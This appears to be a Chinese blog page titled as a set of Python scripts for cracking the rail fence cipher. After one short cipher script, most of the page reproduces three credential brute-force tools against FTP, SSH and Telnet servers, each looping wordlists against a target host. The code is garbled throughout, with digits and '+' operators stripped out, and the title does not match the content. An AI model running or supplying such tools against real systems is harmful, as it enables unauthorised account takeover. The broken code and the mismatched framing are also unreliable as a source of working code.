Python脚本多种方法破解栅栏密码
Python是一种计算机程序设计语言。是一种面向对象的动态类型语言,最初被设计用于编写自动化脚本(shell),随着版本的不断更新和语言新功能的添加,越来越多被用于独立的、大型项目的开发。
Python脚本简单易用,对于要破解的栅栏密码,最简单的可以使用快速编写的Python脚本进行暴力破解:
通用脚本:
#!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_ -*- e = raw_input(‘请输入要解密的字符串\n‘) elen = len(e) field=[] for i in range(,elen): if(elen%i==): field.append(i) for f in field: b = elen / f result = {x:‘‘ for x in range(b)} for i in range(elen): a = i % b; result.update({a:result[a] e[i]}) d = ‘‘ for i in range(b): d = d result[i] print ‘分为\t‘ str(f) ‘\t‘ ‘栏时,解密结果为: ‘ d
FTP暴力破解脚本
#!/usr/bin/env python #-*-coding = utf--*- #author:@xfk #blog:@blog.sina.com.cn/kaiyongdeng #date:@-- import sys, os, time from ftplib import FTP docs = """ [*] This was written for educational purpose and pentest only. Use it at your own risk. [*] Author will be not responsible for any damage! [*] Toolname : ftp_bf.py [*] Coder : [*] Version : . [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt """ if sys.platform == 'linux' or sys.platform == 'linux': clearing = 'clear' else: clearing = 'cls' os.system(clearing) R = "\[m"; G = "\[m"; Y = "\[m" END = "\[m" def logo(): print G "\n |---------------------------------------------------------------|" print " | |" print " | blog.sina.com.cn/kaiyongdeng |" print " | // ftp_bf.py v.. |" print " | FTP Brute Forcing Tool |" print " | |" print " |---------------------------------------------------------------|\n" print " \n [-] %s\n" % time.strftime("%X") print docs END def help(): print R "[*]-t, --target ip/hostname <> Our target" print "[*]-u, --usernamelist usernamelist <> usernamelist path" print "[*]-p, --passwordlist passwordlist <> passwordlist path" print "[*]-h, --help help <> print this help" print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt" END sys.exit() def bf_login(hostname,username,password): # sys.stdout.write("\r[!]Checking : %s " % (p)) # sys.stdout.flush() try: ftp = FTP(hostname) ftp.login(hostname,username, password) ftp.retrlines('list') ftp.quit() print Y "\n[!] wt,wt!!! We did it ! " print "[ ] Target : ",hostname, "" print "[ ] User : ",username, "" print "[ ] Password : ",password, "" END return # sys.exit() except Exception, e: pass except KeyboardInterrupt: print R "\n[-] Exiting ...\n" END sys.exit() def anon_login(hostname): try: print G "\n[!] Checking for anonymous login.\n" END ftp = FTP(hostname) ftp.login() ftp.retrlines('LIST') print Y "\n[!] wt,wt!!! Anonymous login successfuly !\n" END ftp.quit() except Exception, e: print R "\n[-] Anonymous login failed...\n" END pass def main(): logo() try: for arg in sys.argv: if arg.lower() == '-t' or arg.lower() == '--target': hostname = sys.argv[int(sys.argv[:].index(arg)) ] elif arg.lower() == '-u' or arg.lower() == '--usernamelist': usernamelist = sys.argv[int(sys.argv[:].index(arg)) ] elif arg.lower() == '-p' or arg.lower() == '--passwordlist': passwordlist = sys.argv[int(sys.argv[:].index(arg)) ] elif arg.lower() == '-h' or arg.lower() == '--help': help() elif len(sys.argv) <= : help() except: print R "[-]Cheak your parametars input\n" END help() print G "[!] BruteForcing target ..." END anon_login(hostname) # print "here is ok" # print hostname try: usernames = open(usernamelist, "r") user = usernames.readlines() count = while count < len(user): user[count] = user[count].strip() count = except: print R "\n[-] Cheak your usernamelist path\n" END sys.exit() # print "here is ok ",usernamelist,passwordlist try: passwords = open(passwordlist, "r") pwd = passwords.readlines() count = while count < len(pwd): pwd[count] = pwd[count].strip() count = except: print R "\n[-] Check your passwordlist path\n" END sys.exit() print G "\n[ ] Loaded:",len(user),"usernames" print "\n[ ] Loaded:",len(pwd),"passwords" print "[ ] Target:",hostname print "[ ] Guessing...\n" END for u in user: for p in pwd: result = bf_login(hostname,u.replace("\n",""),p.replace("\n","")) if result != : print G "[ ]Attempt uaername:%s password:%s..." % (u,p) R "Disenable" END else: print G "[ ]Attempt uaername:%s password:%s..." % (u,p) Y "Enable" END if not result : print R "\n[-]There is no username ans password enabled in the list." print "[-]Exiting...\n" END if __name__ == "__main__": main()
SSH暴力破解
#!/usr/bin/env python #-*-coding = UTF--*- #author@:dengyongkai #blog@:blog.sina.com.cn/kaiyongdeng import sys import os import time #from threading import Thread try: from paramiko import SSHClient from paramiko import AutoAddPolicy except ImportError: print G ''' You need paramiko module. http://www.lag.net/paramiko/ Debian/Ubuntu: sudo apt-get install aptitude : sudo aptitude install python-paramiko\n''' END sys.exit() docs = """ [*] This was written for educational purpose and pentest only. Use it at your own risk. [*] Author will be not responsible for any damage! [*] Toolname : ssh_bf.py [*] Author : xfk [*] Version : v.. [*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help] """ if sys.platform == 'linux' or sys.platform == 'linux': clearing = 'clear' else: clearing = 'cls' os.system(clearing) R = "\[m"; G = "\[m"; Y = "\[m" END = "\[m" def logo(): print G "\n |---------------------------------------------------------------|" print " | |" print " | blog.sina.com.cn/kaiyongdeng |" print " | // ssh_bf.py v.. |" print " | SSH Brute Forcing Tool |" print " | |" print " |---------------------------------------------------------------|\n" print " \n [-] %s\n" % time.ctime() print docs END def help(): print Y " [*]-H --hostname/ip <>the target hostname or ip address" print " [*]-P --port <>the ssh service port(default is )" print " [*]-U --usernamelist <>usernames list file" print " [*]-P --passwordlist <>passwords list file" print " [*]-H --help <>show help information" print " [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]" END sys.exit() def BruteForce(hostname,port,username,password): ''' Create SSH connection to target ''' ssh = SSHClient() ssh.set_missing_host_key_policy(AutoAddPolicy()) try: ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False) status = 'ok' ssh.close() except Exception, e: status = 'error' pass return status def makelist(file): ''' Make usernames and passwords lists ''' items = [] try: fd = open(file, 'r') except IOError: print R 'unable to read file \'%s\'' % file END pass except Exception, e: print R 'unknown error' END pass for line in fd.readlines(): item = line.replace('\n', '').replace('\r', '') items.append(item) fd.close() return items def main(): logo() # print "hello wold" try: for arg in sys.argv: if arg.lower() == '-t' or arg.lower() == '--target': hostname = str(sys.argv[int(sys.argv[:].index(arg)) ]) if arg.lower() == '-p' or arg.lower() == '--port': port = sys.argv[int(sys.argv[:].index(arg)) ] elif arg.lower() == '-u' or arg.lower() == '--userlist': userlist = sys.argv[int(sys.argv[:].index(arg)) ] elif arg.lower() == '-w' or arg.lower() == '--wordlist': wordlist = sys.argv[int(sys.argv[:].index(arg)) ] elif arg.lower() == '-h' or arg.lower() == '--help': help() elif len(sys.argv) <= : help() except: print R "[-]Cheak your parametars input\n" END help() print G "\n[!] BruteForcing target ...\n" END # print "here is ok" # print hostname,port,wordlist,userlist usernamelist = makelist(userlist) passwordlist = makelist(wordlist) print Y "[*] SSH Brute Force Praparing." print "[*] %s user(s) loaded." % str(len(usernamelist)) print "[*] %s password(s) loaded." % str(len(passwordlist)) print "[*] Brute Force Is Starting......." END try: for username in usernamelist: for password in passwordlist: print G "\n[ ]Attempt uaername:%s password:%s..." % (username,password) END current = BruteForce(hostname, port, username, password) if current == 'error': print R "[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password) END # pass else: print G "\n[ ] ^-^ HaHa,We Got It!!!" print "[ ] username: %s" % username print "[ ] password: %s\n" % password END # sys.exit() except: print R "\n[-] There Is Something Wrong,Pleace Cheak It." print "[-] Exitting.....\n" END raise print Y "[ ] Done.^-^\n" END sys.exit() if __name__ == "__main__": main()
TELNET密码暴力破解
#!usr/bin/python #Telnet Brute Forcer #http://www.darkcde.com #dhydr[at]gmail[dot]com import threading, time, random, sys, telnetlib from copy import copy if len(sys.argv) !=: print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>" sys.exit() try: users = open(sys.argv[], "r").readlines() except(IOError): print "Error: Check your userlist path\n" sys.exit() try: words = open(sys.argv[], "r").readlines() except(IOError): print "Error: Check your wordlist path\n" sys.exit() print "\n\t dhydr[at]gmail[dot]com TelnetBruteForcer v." print "\t--------------------------------------------------\n" print "[ ] Server:",sys.argv[] print "[ ] Users Loaded:",len(users) print "[ ] Words Loaded:",len(words),"\n" wordlist = copy(words) def reloader(): for word in wordlist: words.append(word) def getword(): lock = threading.Lock() lock.acquire() if len(words) != : value = random.sample(words, ) words.remove(value[]) else: print "\nReloading Wordlist - Changing User\n" reloader() value = random.sample(words, ) users.remove(users[]) lock.release() if len(users) ==: return value[][:-], users[] else: return value[][:-], users[][:-] class Worker(threading.Thread): def run(self): value, user = getword() try: print "-"* print "User:",user,"Password:",value tn = telnetlib.Telnet(sys.argv[]) tn.read_until("login: ") tn.write(user "\n") if password: tn.read_until("Password: ") tn.write(value "\n") tn.write("ls\n") tn.write("exit\n") print tn.read_all() print "\t\nLogin successful:",value, user tn.close() work.join() sys.exit() except: pass for I in range(len(words)*len(users)): work = Worker() work.start() time.sleep()</wordlist></userlist></server>
您可能感兴趣的文章:
5种方法,加密你的Python代码 !
python代码如何加密
python怎么破解压缩包密码
【哈希密码】PHP比md5更安全的加密方式
Python脚本多种方法破解栅栏密码
压缩文件忘记密码怎么办 压缩文件密码找回方法
php加密是什么
PHP代码加密的几种方法介绍
php源码怎么防止破解
python怎么做反爬